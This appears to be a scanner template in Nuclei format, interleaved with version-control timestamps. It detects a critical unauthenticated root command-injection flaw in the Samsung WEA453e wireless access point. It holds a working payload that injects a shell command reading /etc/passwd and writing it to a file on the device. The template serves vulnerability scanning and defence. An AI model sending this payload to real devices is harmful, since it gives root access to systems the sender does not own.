2021-02-15 06:17:07 +00:00
id : samsung-wlan-ap-rce
info :
2022-06-03 19:12:31 +00:00
name : Samsung WLAN AP WEA453e - Remote Code Execution
2021-02-15 06:17:07 +00:00
author : pikpikcu
severity : critical
2022-06-03 19:12:31 +00:00
description : Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.
2022-04-22 10:38:41 +00:00
reference :
2022-06-03 19:12:31 +00:00
- https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-06-03 19:12:31 +00:00
cwe-id : CWE-77
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : xss,samsung,rce
2021-02-15 06:17:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-02-15 06:17:07 +00:00
- method : POST
path :
- "{{BaseURL}}/(download)/tmp/poc.txt"
2023-10-14 11:27:55 +00:00
2021-02-15 06:17:07 +00:00
body : "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-24 21:35:55 +00:00
- "bin:.*:1:1"
2021-02-15 06:17:07 +00:00
part : body
2021-07-24 21:35:55 +00:00
2021-02-15 06:17:07 +00:00
- type : status
status :
- 200